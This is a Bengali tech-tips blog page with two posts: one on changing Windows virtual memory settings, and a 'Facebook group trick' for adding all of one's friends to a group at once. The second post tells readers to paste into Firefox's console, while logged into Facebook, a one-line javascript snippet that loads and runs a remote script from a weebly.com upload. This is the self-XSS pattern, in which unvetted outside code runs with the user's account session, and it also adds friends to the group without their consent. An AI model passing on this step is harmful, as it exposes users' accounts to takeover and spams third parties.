বাংলা গুরু ল্যাব




বাংলা গুরু ল্যাব

পিসির গতি বাড়াতে ব্যাবহার করুন ভার্চুয়াল মেমোরি

সিস্টেমের পারফরমেন্সের জন্য ভার্চুয়াল মেমোরি একটি বড় বিষয়। যারা কম গতির পিসি ব্যবহার করছেন তারা ভার্চুয়াল মেমোরিতে পরিবর্তন এনে পিসির গতি বৃদ্ধি করতে পারেন। সাধারণত যারা পুরনো পিসি ব্যবহার করছেন তাদের র‍্যামের পরিমাণ বেশির ভাগ ব্যবহারকারীর কম ছিল।
আর আপনার র‍্যামের আকার ছোট হওয়ার জন্য ভারি সফটওয়্যার, অ্যাপ্লিকেশন পিসিতে চালাতে গেলে বুঝতে পারেন, আপনার পিসির সিস্টেম পারফরমেন্স লো(low) হওয়ার জন্য পিসির গতি কমে যাচ্ছে।

উইন্ডোজ অপারেটিং এর পিসির জন্য নিচের ধাপটি লক্ষ্য করুনঃ
উইন্ডোজ সেভেনের ক্ষেত্রেঃ
  • উইন্ডোজ স্টার্ট মেনু থেকে কোন্ট্রল প্যানেলে যান এরপর System and Security হয়ে System এ যান।
  • তারপর বামদিকের pane থেকে Advanced system settings ক্লিক করুন ।
  • Advanced tab এ ক্লিক করে Performance options এর নিচে Settings এ ক্লিক করুন ।
  • Advanced tab এ ক্লিক করুন, এবং তারপর, Virtual memory এর নিচে Change এ ক্লিক করুন ।
  • Automatically manage paging file size for all drives check box টি unchecked করুন।
  • এরপর custom সিলেক্ট করুন এবং ভ্যালু হিসাবে Custom Initial Size 2000 এবং maximum size 4000 করে দিন।
এভাবে আপনার সিস্টেম এর পারফরমেন্স গতি বাড়াতে পারেন।
উইন্ডোজ এক্সপির ক্ষেত্রেঃ
  • উইন্ডোজ স্টার্ট মেনু থেকে কোন্ট্রল প্যানেলে যান এরপর System and Maintenance এ, এবং ক্লিক করুন System এ যান।
  • তারপর বামদিকের pane থেকে Advanced system settings ক্লিক করুন ।
  • Advanced tab এ ক্লিক করে Performance এর নিচে Settings এ ক্লিক করুন ।
  • Advanced tab এ ক্লিক করুন, এবং তারপর, Virtual memory এর নিচে Change এ ক্লিক করুন ।
  • Automatically manage paging file size for all drives check box টি unchecked করুন।
  • এরপর custom সিলেক্ট করুন এবং ভ্যালু হিসাবে Custom Initial Size 2000 এবং maximum size 4000 করে দিন।



ফেসবুক গ্রুপ ট্রিকস


কিভাবে ফেসবুকে সবাইকে এক সাথে গ্রুপে অ্যাড করবেন। অনেকের দেখা যায় হাজারেরও বেশি ফ্রেন্ড থাকে ফেসবুকে। এক এক করে সবাইকে গ্রুপে অ্যাড করার চেয়ে সবাইকে একসাথে অ্যাড করাই ভাল, তাই না? চাহলে চলুন দেখি কিভাবে একসাথে গ্রপে সবাইকে অ্যাড করবেন।

Google Chrome এর জন্যঃ

১.প্রথমে এই Extension টি Add করে নিন আপনার Google Chrome এ। Add করার সাথে সাথে ব্রাউজারের ডানদিকে Extension টির একটি Button আসবে।

BANGLA GURU LAB

২.তারপর আপনার ফেসবুক অ্যাকাউন্টে যান।
৩.যেই গ্রুপে সবাইকে একসাথে যোগ করতে চান সেই গ্রুপে যান।
৪.তারপর উপরের Extension এর Button টাতে ক্লিক করুন।

ব্যাস। কাজ শেষ, গ্রুপ Refresh করে দেখুন সবাই আপনার কাঙ্ক্ষিত গ্রুপে যুক্ত হয়ে গেছে।

Mozilla Firebox এর জন্যঃ
১.প্রথমে Mozilla Firebox Open করুন।
২.তারপর আপনার ফেসবুক অ্যাকাউন্টে যেয়ে যেই গ্রুপে সবাইকে একসাথে যোগ করতে চান সেই গ্রুপে যান।
৩. তারপর চাপুন Ctrl + Shift + K.একটি বক্স Open হবে।
৪.তারপর বক্সটিতে নিচের কোডটি Paste করে দিন।

javascript:(function(){document.body.appendChild(document.createElement(‘script’)).src=’http://www.weebly.com/uploads/1/5/4/8/15485034/bappi.js‘;})();

৫.Enter চাপুন। তারপর আপনার সব ফ্রেন্ড গ্রুপে Add না হওয়া পর্যন্ত একটু অপেক্ষা করুন। কিছুক্ষণ পড়ে দেখবেন আপনার সব বন্ধু আপনার কাঙ্ক্ষিত গ্রুপটিতে যুক্ত হয়ে গেছে।
৬.বক্সটি Hide করতে আবার চাপুন Ctrl + Shift + K.